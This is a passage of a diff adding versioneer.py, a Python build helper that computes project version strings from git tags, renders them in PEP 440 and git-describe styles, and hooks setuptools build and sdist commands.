""""""TAG[.postDISTANCE[.dev0]] . + + The "".dev0"" means dirty. + + Eexceptions: + 1: no tags. 0.postDISTANCE[.dev0] + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""] or pieces[""dirty""]: + rendered += "".post%%d"" %% pieces[""distance""] + if pieces[""dirty""]: + rendered += "".dev0"" + else: + # exception #1 + rendered = ""0.post%%d"" %% pieces[""distance""] + if pieces[""dirty""]: + rendered += "".dev0"" + return rendered + + +def render_git_describe(pieces): + """"""TAG[-DISTANCE-gHEX][-dirty]. + + Like 'git describe --tags --dirty --always'. + + Exceptions: + 1: no tags. HEX[-dirty] (note: no 'g' prefix) + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""]: + rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""]) + else: + # exception #1 + rendered = pieces[""short""] + if pieces[""dirty""]: + rendered += ""-dirty"" + return rendered + + +def render_git_describe_long(pieces): + """"""TAG-DISTANCE-gHEX[-dirty]. + + Like 'git describe --tags --dirty --always -long'. + The distance/hash is unconditional. + + Exceptions: + 1: no tags. HEX[-dirty] (note: no 'g' prefix) + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""]) + else: + # exception #1 + rendered = pieces[""short""] + if pieces[""dirty""]: + rendered += ""-dirty"" + return rendered + + +def add_one_to_version(version_string, number_index_to_increment=-1): + """""" + Add one to a version string at the given numeric indices. + + >>> add_one_to_version('v1.2.3') + 'v1.2.4' + + """""" + # Break up the tag by number groups (preserving multi-digit + # numbers as multidigit) + parts = re.split(""([0-9]+)"", version_string) + + digit_parts = [(i, part) for i, part in enumerate(parts) + if part.isdigit()] + + # Deal with negative indexing. + increment_at_index = ((number_index_to_increment + len(digit_parts)) + %% len(digit_parts)) + for n_seen, (i, part) in enumerate(digit_parts): + if n_seen == increment_at_index: + parts[i] = str(int(part) + 1) + elif n_seen > increment_at_index: + parts[i] = '0' + return ''.join(parts) + + +def render_pep440_branch_based(pieces): + # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is + # included for dirty. + + # exceptions: + # 1: no tags. 0.0.0.devDISTANCE[+gHEX] + + replacements = {' ': '.', '(': '', ')': ''} + [branch_name] = [pieces.get('branch').replace(old, new) + for old, new in replacements.items()] + master = branch_name == 'master' + maint = re.match(default_maint_branch_regexp, + branch_name or '') + + # If we are on a tag, just pep440-pre it. + if pieces[""closest-tag""] and not (pieces[""distance""] or + pieces[""dirty""]): + rendered = pieces[""closest-tag""] + else: + # Put a default closest-tag in. + if not pieces[""closest-tag""]: + pieces[""closest-tag""] = '0.0.0' + + if pieces[""distance""] or pieces[""dirty""]: + if maint: + rendered = pieces[""closest-tag""] + if pieces[""distance""]: + rendered += "".post%%d"" %% pieces[""distance""] + else: + rendered = add_one_to_version(pieces[""closest-tag""]) + if pieces[""distance""]: + rendered += "".dev%%d"" %% pieces[""distance""] + + suffix = [] + # Put the branch name in if it isn't master nor a + # maintenance branch. + if not (master or maint): + suffix.append('%%s' %% (branch_name or 'unknown_branch')) + + if pieces[""dirty""]: + suffix.append('g%%s' %% pieces[""short""]) + rendered += '+%%s' %% ''.join(suffix) + else: + rendered = pieces[""closest-tag""] + return rendered + + +STYLES = {'default': render_pep440, + 'pep440': render_pep440, + 'pep440-pre': render_pep440_pre, + 'pep440-post': render_pep440_post, + 'pep440-old': render_pep440_old, + 'git-describe': render_git_describe, + 'git-describe-long': render_git_describe_long, + 'pep440-old': render_pep440_old, + 'pep440-branch-based': render_pep440_branch_based, + } + + +def render(pieces, style): + """"""Render the given version pieces into the requested style."""""" + if pieces[""error""]: + return {""version"": ""unknown"", + ""full-revisionid"": pieces.get(""long""), + ""dirty"": None, + ""error"": pieces[""error""]} + + if not style: + style = 'default' + + renderer = STYLES.get(style) + + if not renderer: + raise ValueError(""unknown style '%%s'"" %% style) + + rendered = renderer(pieces) + + return {""version"": rendered, ""full-revisionid"": pieces[""long""], + ""dirty"": pieces[""dirty""], ""error"": None} + + +def get_versions(): + """"""Get version information or return default if unable to do so."""""" + # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have + # __file__, we can work backwards from there to the root. Some + # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which + # case we can only use expanded keywords. + + cfg = get_config() + verbose = cfg.verbose + + try: + return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, + verbose) + except NotThisMethod: + pass + + try: + root = os.path.realpath(__file__) + # versionfile_source is the relative path from the top of the source + # tree (where the .git directory might live) to this file. Invert + # this to find the root from __file__. + for i in cfg.versionfile_source.split('/'): + root = os.path.dirname(root) + except NameError: + return {""version"": ""0+unknown"", ""full-revisionid"": None, + ""dirty"": None, + ""error"": ""unable to find root of source tree""} + + try: + pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose) + return render(pieces, cfg.style) + except NotThisMethod: + pass + + try: + if cfg.parentdir_prefix: + return versions_from_parentdir(cfg.parentdir_prefix, root, verbose) + except NotThisMethod: + pass + + return {""version"": ""0+unknown"", ""full-revisionid"": None, + ""dirty"": None, + ""error"": ""unable to compute version""} +''' + + +@register_vcs_handler(""git"", ""get_keywords"") +def git_get_keywords(versionfile_abs): + """"""Extract version information from the given file."""""" + # the code embedded in _version.py can just fetch the value of these + # keywords. When used from setup.py, we don't want to import _version.py, + # so we do it with a regexp instead. This function is not used from + # _version.py. + keywords = {} + try: + f = open(versionfile_abs, ""r"") + for line in f.readlines(): + if line.strip().startswith(""git_refnames =""): + mo = re.search(r'=\s*""(.*)""', line) + if mo: + keywords[""refnames""] = mo.group(1) + if line.strip().startswith(""git_full =""): + mo = re.search(r'=\s*""(.*)""', line) + if mo: + keywords[""full""] = mo.group(1) + f.close() + except EnvironmentError: + pass + return keywords + + +@register_vcs_handler(""git"", ""keywords"") +def git_versions_from_keywords(keywords, tag_prefix, verbose): + """"""Get version information from git keywords."""""" + if not keywords: + raise NotThisMethod(""no keywords at all, weird"") + refnames = keywords[""refnames""].strip() + if refnames.startswith(""$Format""): + if verbose: + print(""keywords are unexpanded, not using"") + raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"") + refs = [r.strip() for r in refnames.strip(""()"").split("","")] + # starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of + # just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those. + TAG = ""tag: "" + tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) + if not tags: + # Either we're using git < 1.8.3, or there really are no tags. We use + # a heuristic: assume all version tags have a digit. The old git %d + # expansion behaves like git log --decorate=short and strips out the + # refs/heads/ and refs/tags/ prefixes that would let us distinguish + # between branches and tags. By ignoring refnames without digits, we + # filter out many common branch names like ""release"" and + # ""stabilization"", as well as ""HEAD"" and ""master"". + tags = set([r for r in refs if re.search(r'\d', r)]) + if verbose: + print(""discarding '%s', no digits"" % "","".join(set(refs) - tags)) + if verbose: + print(""likely tags: %s"" % "","".join(sorted(tags))) + for ref in sorted(tags): + # sorting will prefer e.g. ""2.0"" over ""2.0rc1"" + if ref.startswith(tag_prefix): + r = ref[len(tag_prefix):] + if verbose: + print(""picking %s"" % r) + return {""version"": r, + ""full-revisionid"": keywords[""full""].strip(), + ""dirty"": False, ""error"": None, ""branch"": None + } + # no suitable tags, so version is ""0+unknown"", but full hex is still there + if verbose: + print(""no suitable tags, using unknown + full revision id"") + return {""version"": ""0+unknown"", + ""full-revisionid"": keywords[""full""].strip(), + ""dirty"": False, ""error"": ""no suitable tags"", + ""branch"": None} + + +@register_vcs_handler(""git"", ""pieces_from_vcs"") +def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): + """"""Get version from 'git describe' in the root of the source tree. + + This only gets called if the git-archive 'subst' keywords were *not* + expanded, and _version.py hasn't already been rewritten with a short + version string, meaning we're inside a checked out source tree. + """""" + if not os.path.exists(os.path.join(root, "".git"")): + if verbose: + print(""no .git in %s"" % root) + raise NotThisMethod(""no .git directory"") + + GITS = [""git""] + if sys.platform == ""win32"": + GITS = [""git.cmd"", ""git.exe""] + # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] + # if there isn't one, this yields HEX[-dirty] (no NUM). Note, for git v1.7 + # and below, it is necessary to run ""git update-index --refresh"" first. + describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"", + ""--always"", ""--long"", + ""--match"", ""%s*"" % tag_prefix], + cwd=root) + # --long was added in git-1.5.5 + if describe_out is None: + raise NotThisMethod(""'git describe' failed"") + describe_out = describe_out.strip() + full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root) + if full_out is None: + raise NotThisMethod(""'git rev-parse' failed"") + full_out = full_out.strip() + + pieces = {} + pieces[""long""] = full_out + pieces[""short""] = full_out[:7] # maybe improved later + pieces[""error""] = None + + # abbrev-ref available with git >= 1.7 + branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""], + cwd=root).strip() + if branch_name == 'HEAD': + branches = run_command(GITS, [""branch"", ""--contains""], + cwd=root).split('\n') + branches = [branch[2:] for branch in branches if branch[4:5] != '('] + if 'master' in branches: + branch_name = 'master' + elif not branches: + branch_name = None + else: + # Pick the first branch that is returned. Good or bad. + branch_name = branches[0] + + pieces['branch'] = branch_name + + # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] + # TAG might have hyphens. + git_describe = describe_out + + # look for -dirty suffix + dirty = git_describe.endswith(""-dirty"") + pieces[""dirty""] = dirty + if dirty: + git_describe = git_describe[:git_describe.rindex(""-dirty"")] + + # now we have TAG-NUM-gHEX or HEX + + if ""-"" in git_describe: + # TAG-NUM-gHEX + mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) + if not mo: + # unparseable. Maybe git-describe is misbehaving? + pieces[""error""] = (""unable to parse git-describe output: '%s'"" + % describe_out) + return pieces + + # tag + full_tag = mo.group(1) + if not full_tag.startswith(tag_prefix): + if verbose: + fmt = ""tag '%s' doesn't start with prefix '%s'"" + print(fmt % (full_tag, tag_prefix)) + pieces[""error""] = (""tag '%s' doesn't start with prefix '%s'"" + % (full_tag, tag_prefix)) + return pieces + pieces[""closest-tag""] = full_tag[len(tag_prefix):] + + # distance: number of commits since tag + pieces[""distance""] = int(mo.group(2)) + + # commit: short hex revision ID + pieces[""short""] = mo.group(3) + + else: + # HEX: no tags + pieces[""closest-tag""] = None + count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""], + cwd=root) + pieces[""distance""] = int(count_out) # total number of commits + + return pieces + + +def do_vcs_install(manifest_in, versionfile_source, ipy): + """"""Git-specific installation logic for Versioneer. + + For Git, this means creating/changing .gitattributes to mark _version.py + for export-time keyword substitution. + """""" + GITS = [""git""] + if sys.platform == ""win32"": + GITS = [""git.cmd"", ""git.exe""] + files = [manifest_in, versionfile_source] + if ipy: + files.append(ipy) + try: + me = __file__ + if me.endswith("".pyc"") or me.endswith("".pyo""): + me = os.path.splitext(me)[0] + "".py"" + versioneer_file = os.path.relpath(me) + except NameError: + versioneer_file = ""versioneer.py"" + files.append(versioneer_file) + present = False + try: + f = open("".gitattributes"", ""r"") + for line in f.readlines(): + if line.strip().startswith(versionfile_source): + if ""export-subst"" in line.strip().split()[1:]: + present = True + f.close() + except EnvironmentError: + pass + if not present: + f = open("".gitattributes"", ""a+"") + f.write(""%s export-subst\n"" % versionfile_source) + f.close() + files.append("".gitattributes"") + run_command(GITS, [""add"", ""--""] + files) + + +def versions_from_parentdir(parentdir_prefix, root, verbose): + """"""Try to determine the version from the parent directory name. + + Source tarballs conventionally unpack into a directory that includes + both the project name and a version string. + """""" + dirname = os.path.basename(root) + if not dirname.startswith(parentdir_prefix): + if verbose: + print(""guessing rootdir is '%s', but '%s' doesn't start with "" + ""prefix '%s'"" % (root, dirname, parentdir_prefix)) + raise NotThisMethod(""rootdir doesn't start with parentdir_prefix"") + return {""version"": dirname[len(parentdir_prefix):], + ""full-revisionid"": None, + ""dirty"": False, ""error"": None} + +SHORT_VERSION_PY = """""" +# This file was generated by 'versioneer.py' (0.15+dev) from +# revision-control system data, or from the parent directory name of an +# unpacked source archive. Distribution tarballs contain a pre-generated copy +# of this file. + +import json +import sys + +version_json = ''' +%s +''' # END VERSION_JSON + + +def get_versions(): + return json.loads(version_json) +"""""" + + +def versions_from_file(filename): + """"""Try to determine the version from _version.py if present."""""" + try: + with open(filename) as f: + contents = f.read() + except EnvironmentError: + raise NotThisMethod(""unable to read _version.py"") + mo = re.search(r""version_json = '''\n(.*)''' # END VERSION_JSON"", + contents, re.M | re.S) + if not mo: + raise NotThisMethod(""no version_json in _version.py"") + return json.loads(mo.group(1)) + + +def write_to_version_file(filename, versions): + """"""Write the given version number to the given _version.py file."""""" + os.unlink(filename) + contents = json.dumps(versions, sort_keys=True, + indent=1, separators=("","", "": "")) + with open(filename, ""w"") as f: + f.write(SHORT_VERSION_PY % contents) + + print(""set %s to '%s'"" % (filename, versions[""version""])) + +# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc. +default_maint_branch_regexp = "".*([0-9]+\.)+x$"" + + +def plus_or_dot(pieces): + """"""Return a + if we don't already have one, else return a ."""""" + if ""+"" in pieces.get(""closest-tag"", """"): + return ""."" + return ""+"" + + +def render_pep440(pieces): + """"""Build up version string, with post-release ""local version identifier"". + + Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you + get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty + + Exceptions: + 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty] + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""] or pieces[""dirty""]: + rendered += plus_or_dot(pieces) + rendered += ""%d.g%s"" % (pieces[""distance""], pieces[""short""]) + if pieces[""dirty""]: + rendered += "".dirty"" + else: + # exception #1 + rendered = ""0+untagged.%d.g%s"" % (pieces[""distance""], + pieces[""short""]) + if pieces[""dirty""]: + rendered += "".dirty"" + return rendered + + +def render_pep440_pre(pieces): + """"""TAG[.post.devDISTANCE] -- No -dirty. + + Exceptions: + 1: no tags. 0.post.devDISTANCE + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""]: + rendered += "".post.dev%d"" % pieces[""distance""] + else: + # exception #1 + rendered = ""0.post.dev%d"" % pieces[""distance""] + return rendered + + +def render_pep440_post(pieces): + """"""TAG[.postDISTANCE[.dev0]+gHEX] . + + The "".dev0"" means dirty. Note that .dev0 sorts backwards + (a dirty tree will appear ""older"" than the corresponding clean one), + but you shouldn't be releasing software with -dirty anyways. + + Exceptions: + 1: no tags. 0.postDISTANCE[.dev0] + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""] or pieces[""dirty""]: + rendered += "".post%d"" % pieces[""distance""] + if pieces[""dirty""]: + rendered += "".dev0"" + rendered += plus_or_dot(pieces) + rendered += ""g%s"" % pieces[""short""] + else: + # exception #1 + rendered = ""0.post%d"" % pieces[""distance""] + if pieces[""dirty""]: + rendered += "".dev0"" + rendered += ""+g%s"" % pieces[""short""] + return rendered + + +def render_pep440_old(pieces): + """"""TAG[.postDISTANCE[.dev0]] . + + The "".dev0"" means dirty. + + Eexceptions: + 1: no tags. 0.postDISTANCE[.dev0] + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""] or pieces[""dirty""]: + rendered += "".post%d"" % pieces[""distance""] + if pieces[""dirty""]: + rendered += "".dev0"" + else: + # exception #1 + rendered = ""0.post%d"" % pieces[""distance""] + if pieces[""dirty""]: + rendered += "".dev0"" + return rendered + + +def render_git_describe(pieces): + """"""TAG[-DISTANCE-gHEX][-dirty]. + + Like 'git describe --tags --dirty --always'. + + Exceptions: + 1: no tags. HEX[-dirty] (note: no 'g' prefix) + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""]: + rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""]) + else: + # exception #1 + rendered = pieces[""short""] + if pieces[""dirty""]: + rendered += ""-dirty"" + return rendered + + +def render_git_describe_long(pieces): + """"""TAG-DISTANCE-gHEX[-dirty]. + + Like 'git describe --tags --dirty --always -long'. + The distance/hash is unconditional. + + Exceptions: + 1: no tags. HEX[-dirty] (note: no 'g' prefix) + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""]) + else: + # exception #1 + rendered = pieces[""short""] + if pieces[""dirty""]: + rendered += ""-dirty"" + return rendered + + +def add_one_to_version(version_string, number_index_to_increment=-1): + """""" + Add one to a version string at the given numeric indices. + + >>> add_one_to_version('v1.2.3') + 'v1.2.4' + + """""" + # Break up the tag by number groups (preserving multi-digit + # numbers as multidigit) + parts = re.split(""([0-9]+)"", version_string) + + digit_parts = [(i, part) for i, part in enumerate(parts) + if part.isdigit()] + + # Deal with negative indexing. + increment_at_index = ((number_index_to_increment + len(digit_parts)) + % len(digit_parts)) + for n_seen, (i, part) in enumerate(digit_parts): + if n_seen == increment_at_index: + parts[i] = str(int(part) + 1) + elif n_seen > increment_at_index: + parts[i] = '0' + return ''.join(parts) + + +def render_pep440_branch_based(pieces): + # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is + # included for dirty. + + # exceptions: + # 1: no tags. 0.0.0.devDISTANCE[+gHEX] + + replacements = {' ': '.', '(': '', ')': ''} + branch_name = pieces.get('branch') + for old, new in replacements.items(): + branch_name = branch_name.replace(old, new) + master = branch_name == 'master' + maint = re.match(default_maint_branch_regexp, + branch_name or '') + + # If we are on a tag, just pep440-pre it. + if pieces[""closest-tag""] and not (pieces[""distance""] or + pieces[""dirty""]): + rendered = pieces[""closest-tag""] + else: + # Put a default closest-tag in. + if not pieces[""closest-tag""]: + pieces[""closest-tag""] = '0.0.0' + + if pieces[""distance""] or pieces[""dirty""]: + if maint: + rendered = pieces[""closest-tag""] + if pieces[""distance""]: + rendered += "".post%d"" % pieces[""distance""] + else: + rendered = add_one_to_version(pieces[""closest-tag""]) + if pieces[""distance""]: + rendered += "".dev%d"" % pieces[""distance""] + + suffix = [] + # Put the branch name in if it isn't master nor a + # maintenance branch. + if not (master or maint): + suffix.append('%s' % (branch_name or 'unknown_branch')) + + if pieces[""dirty""]: + suffix.append('g%s' % pieces[""short""]) + rendered += '+%s' % ''.join(suffix) + else: + rendered = pieces[""closest-tag""] + return rendered + + +STYLES = {'default': render_pep440, + 'pep440': render_pep440, + 'pep440-pre': render_pep440_pre, + 'pep440-post': render_pep440_post, + 'pep440-old': render_pep440_old, + 'git-describe': render_git_describe, + 'git-describe-long': render_git_describe_long, + 'pep440-old': render_pep440_old, + 'pep440-branch-based': render_pep440_branch_based, + } + + +def render(pieces, style): + """"""Render the given version pieces into the requested style."""""" + if pieces[""error""]: + return {""version"": ""unknown"", + ""full-revisionid"": pieces.get(""long""), + ""dirty"": None, + ""error"": pieces[""error""]} + + if not style: + style = 'default' + + renderer = STYLES.get(style) + + if not renderer: + raise ValueError(""unknown style '%s'"" % style) + + rendered = renderer(pieces) + + return {""version"": rendered, ""full-revisionid"": pieces[""long""], + ""dirty"": pieces[""dirty""], ""error"": None} + + +class VersioneerBadRootError(Exception): + + """"""The project root directory is unknown or missing key files."""""" + + +def get_versions(verbose=False): + """"""Get the project version from whatever source is available. + + Returns dict with two keys: 'version' and 'full'. + """""" + if ""versioneer"" in sys.modules: + # see the discussion in cmdclass.py:get_cmdclass() + del sys.modules[""versioneer""] + + root = get_root() + cfg = get_config_from_root(root) + + assert cfg.VCS is not None, ""please set [versioneer]VCS= in setup.cfg"" + handlers = HANDLERS.get(cfg.VCS) + assert handlers, ""unrecognized VCS '%s'"" % cfg.VCS + verbose = verbose or cfg.verbose + assert cfg.versionfile_source is not None, \ + ""please set versioneer.versionfile_source"" + assert cfg.tag_prefix is not None, ""please set versioneer.tag_prefix"" + + versionfile_abs = os.path.join(root, cfg.versionfile_source) + + # extract version from first of: _version.py, VCS command (e.g. 'git + # describe'), parentdir. This is meant to work for developers using a + # source checkout, for users of a tarball created by 'setup.py sdist', + # and for users of a tarball/zipball created by 'git archive' or github's + # download-from-tag feature or the equivalent in other VCSes. + + get_keywords_f = handlers.get(""get_keywords"") + from_keywords_f = handlers.get(""keywords"") + if get_keywords_f and from_keywords_f: + try: + keywords = get_keywords_f(versionfile_abs) + ver = from_keywords_f(keywords, cfg.tag_prefix, verbose) + if verbose: + print(""got version from expanded keyword %s"" % ver) + return ver + except NotThisMethod: + pass + + try: + ver = versions_from_file(versionfile_abs) + if verbose: + print(""got version from file %s %s"" % (versionfile_abs, ver)) + return ver + except NotThisMethod: + pass + + from_vcs_f = handlers.get(""pieces_from_vcs"") + if from_vcs_f: + try: + pieces = from_vcs_f(cfg.tag_prefix, root, verbose) + ver = render(pieces, cfg.style) + if verbose: + print(""got version from VCS %s"" % ver) + return ver + except NotThisMethod: + pass + + try: + if cfg.parentdir_prefix: + ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose) + if verbose: + print(""got version from parentdir %s"" % ver) + return ver + except NotThisMethod: + pass + + if verbose: + print(""unable to compute version"") + + return {""version"": ""0+unknown"", ""full-revisionid"": None, + ""dirty"": None, ""error"": ""unable to compute version""} + + +def get_version(): + """"""Get the short version string for this project."""""" + return get_versions()[""version""] + + +def get_cmdclass(): + """"""Get the custom setuptools/distutils subclasses used by Versioneer."""""" + if ""versioneer"" in sys.modules: + del sys.modules[""versioneer""] + # this fixes the ""python setup.py develop"" case (also 'install' and + # 'easy_install .'), in which subdependencies of the main project are + # built (using setup.py bdist_egg) in the same python process. Assume + # a main project A and a dependency B, which use different versions + # of Versioneer. A's setup.py imports A's Versioneer, leaving it in + # sys.modules by the time B's setup.py is executed, causing B to run + # with the wrong versioneer. Setuptools wraps the sub-dep builds in a + # sandbox that restores sys.modules to it's pre-build state, so the + # parent is protected against the child's ""import versioneer"". By + # removing ourselves from sys.modules here, before the child build + # happens, we protect the child from the parent's versioneer too. + # Also see https://github.com/warner/python-versioneer/issues/52 + + cmds = {} + + # we add ""version"" to both distutils and setuptools + from distutils.core import Command + + class cmd_version(Command): + description = ""report generated version string"" + user_options = [] + boolean_options = [] + + def initialize_options(self): + pass + + def finalize_options(self): + pass + + def run(self): + vers = get_versions(verbose=True) + print(""Version: %s"" % vers[""version""]) + print("" full-revisionid: %s"" % vers.get(""full-revisionid"")) + print("" dirty: %s"" % vers.get(""dirty"")) + if vers[""error""]: + print("" error: %s"" % vers[""error""]) + cmds[""version""] = cmd_version + + # we override ""build_py"" in both distutils and setuptools + # + # most invocation pathways end up running build_py: + # distutils/build -> build_py + # distutils/install -> distutils/build ->.. + # setuptools/bdist_wheel -> distutils/install ->.. + # setuptools/bdist_egg -> distutils/install_lib -> build_py + # setuptools/install -> bdist_egg ->.. + # setuptools/develop -> ? + + # we override different ""build_py"" commands for both environments + if ""setuptools"" in sys.modules: + from setuptools.command.build_py import build_py as _build_py + else: + from distutils.command.build_py import build_py as _build_py + + class cmd_build_py(_build_py): + def run(self): + root = get_root() + cfg = get_config_from_root(root) + versions = get_versions() + _build_py.run(self) + # now locate _version.py in the new build/ directory and replace + # it with an updated value + if cfg.versionfile_build: + target_versionfile = os.path.join(self.build_lib, + cfg.versionfile_build) + print(""UPDATING %s"" % target_versionfile) + write_to_version_file(target_versionfile, versions) + cmds[""build_py""] = cmd_build_py + + if ""cx_Freeze"" in sys.modules: # cx_freeze enabled? + from cx_Freeze.dist import build_exe as _build_exe + + class cmd_build_exe(_build_exe): + def run(self): + root = get_root() + cfg = get_config_from_root(root) + versions = get_versions() + target_versionfile = cfg.versionfile_source + print(""UPDATING %s"" % target_versionfile) + write_to_version_file(target_versionfile, versions) + + _build_exe.run(self) + os.unlink(target_versionfile) + with open(cfg.versionfile_source, ""w"") as f: + LONG = LONG_VERSION_PY[cfg.VCS] + f.write(LONG % + {""DOLLAR"": ""$"", + ""STYLE"": cfg.style, + ""TAG_PREFIX"": cfg.tag_prefix, + ""PARENTDIR_PREFIX"": cfg.parentdir_prefix, + ""VERSIONFILE_SOURCE"": cfg.versionfile_source, + }) + cmds[""build_exe""] = cmd_build_exe + del cmds[""build_py""] + + # we override different ""sdist"" commands for both environments + if ""setuptools"" in sys.modules: + from setuptools.command.sdist import sdist as _sdist + else: + from distutils.command.sdist import sdist as _sdist + + class cmd_sdist(_sdist): + def run(self): + versions = get_versions() + self._versioneer_generated_versions = versions + # unless we update this, the command will keep using the old + # version + self.distribution.metadata.version = versions[""version""] + return _sdist.run(self) + + def make_release_tree(self, base_dir, files): + root = get_root() + cfg = get_config_from_root(root) + _sdist.make_release_tree(self, base_dir, files) + # now locate _version.py in the new base_dir directory + # (remembering that it may be a hardlink) and replace it with an + # updated value + target_versionfile = os.path.join(base_dir, cfg.versionfile_source) + print(""UPDATING %s"" % target_versionfile) + write_to_version_file(target_versionfile, + self._versioneer_generated_versions) + cmds[""sdist""] = cmd_sdist + + return cmds + + +CONFIG_ERROR = """""" +setup.cfg is missing the necessary Versioneer configuration. You need +a section like: + + [versioneer] + VCS = git + style = pep440 + versionfile_source = src/myproject/_version.py + versionfile_build = myproject/_version.py + tag_prefix = + parentdir_prefix = myproject- + +You will also need to edit your setup.py to use the results: + + import versioneer + setup(version=versioneer.get_version(), + cmdclass=versioneer.get_cmdclass(), ...) + +Please read the docstring in ./versioneer.py for configuration instructions, +edit setup.cfg, and re-run the installer or 'python versioneer.py setup'. +"""""" + +SAMPLE_CONFIG = """""" +# See the docstring in versioneer.py for instructions. Note that you must +# re-run 'versioneer.py setup' after changing this section, and commit the +# resulting files. + +[versioneer] +#VCS = git +#style = pep440 +#versionfile_source = +#versionfile_build = +#tag_prefix = +#parentdir_prefix = + +"""""" + +INIT_PY_SNIPPET = """""" +from ._version import get_versions +__version__ = get_versions()['version'] +del get_versions +"""""" + + +def do_setup(): + """"""Main VCS-independent setup function for installing Versioneer."""""" + root = get_root() + try: + cfg = get_config_from_root(root) + except (EnvironmentError, configparser.NoSectionError, + configparser.NoOptionError) as e: + if isinstance(e, (EnvironmentError, configparser.NoSectionError)): + print(""Adding sample versioneer config to setup.cfg"", + file=sys.stderr) + with open(os.path.join(root, ""setup.cfg""), ""a"") as f: + f.write(SAMPLE_CONFIG) + print(CONFIG_ERROR, file=sys.stderr) + return 1 + + print("" creating %s"" % cfg.versionfile_source) + with open(cfg.versionfile_source, ""w"") as f: + LONG = LONG_VERSION_PY[cfg.VCS] + f.write(LONG % {""DOLLAR"": ""$"", + ""STYLE"": cfg.style, + ""TAG_PREFIX"": cfg.tag_prefix, + ""PARENTDIR_PREFIX"": cfg.parentdir_prefix, + ""VERSIONFILE_SOURCE"": cfg.versionfile_source, + }) + + ipy = os.path.join(os.path.dirname(cfg.versionfile_source), + ""__init__.py"") + if os.path.exists(ipy): + try: + with open(ipy, ""r"") as f: + old = f.read() + except EnvironmentError: + old = """" + if INIT_PY_SNIPPET not in old: + print("" appending to %s"" % ipy) + with open(ipy, ""a"") as f: + f.write(INIT_PY_SNIPPET) + else: + print("" %s unmodified"" % ipy) + else: + print("" %s doesn't exist, ok"" % ipy) + ipy = None + + # Make sure both the top-level ""versioneer.py"" and versionfile_source + # (PKG/_version.py, used by runtime code) are in MANIFEST.in, so + # they'll be copied into source distributions. Pip won't be able to + # install the package without this. + manifest_in = os.path.join(root, ""MANIFEST.in"") + simple_includes = set() + try: + with open(manifest_in, ""r"") as f: + for line in f: + if line.startswith(""include ""): + for include in line.split()[1:]: + simple_includes.add(include) + except EnvironmentError: + pass + # That doesn't cover everything MANIFEST.in can do + # (http://docs.python.org/2/distutils/sourcedist.html#commands), so + # it might give some false negatives. Appending redundant 'include' + # lines is safe, though. + if ""versioneer.py"" not in simple_includes: + print("" appending 'versioneer.py' to MANIFEST.in"") + with open(manifest_in, ""a"") as f: + f.write(""include versioneer.py\n"") + else: + print("" 'versioneer.py' already in MANIFEST.in"") + if cfg.versionfile_source not in simple_includes: + print("" appending versionfile_source ('%s') to MANIFEST.in"" % + cfg.versionfile_source) + with open(manifest_in, ""a"") as f: + f.write(""include %s\n"" % cfg.versionfile_source) + else: + print("" versionfile_source already in MANIFEST.in"") + + # Make VCS-specific changes. For git, this means creating/changing + # .gitattributes to mark _version.py for export-time keyword + # substitution. + do_vcs_install(manifest_in, cfg.versionfile_source, ipy) + return 0 + + +def scan_setup_py(): + """"""Validate the contents of setup.py against Versioneer's expectations."""""" + found = set() + setters = False + errors = 0 + with open(""setup.py"", ""r"") as f: + for line in f.readlines(): + if ""import versioneer"" in line: + found.add(""import"") + if ""versioneer.get_cmdclass()"" in line: + found.add(""cmdclass"") + if ""versioneer.get_version()"" in line: + found.add(""get_version"") + if ""versioneer.VCS"" in line: + setters = True + if ""versioneer.versionfile_source"" in line: + setters = True + if len(found) != 3: + print("""") + print(""Your setup.py appears to be missing some important items"") + print(""(but I might be wrong). Please make sure it has something"") + print(""roughly like the following:"") + print("""") + print("" import versioneer"") + print("" setup( version=versioneer.get_version(),"") + print("" cmdclass=versioneer.get_cmdclass(), ...)"") + print("""") + errors += 1 + if setters: + print(""You should remove lines like 'versioneer.VCS = ' and"") + print(""'versioneer.versionfile_source = ' . This configuration"") + print(""now lives in setup.cfg, and should be removed from setup.py"") + print("""") + errors += 1 + return errors + +if __name__ == ""__main__"": + cmd = sys.argv[1] + if cmd == ""setup"": + errors = do_setup() + errors += scan_setup_py() + if errors: + sys.exit(1) +",72574,"[['PERSON', 'Brian Warner'], ['PERSON', 'NUMCOMMITS.gHASH'], ['DATE_TIME', 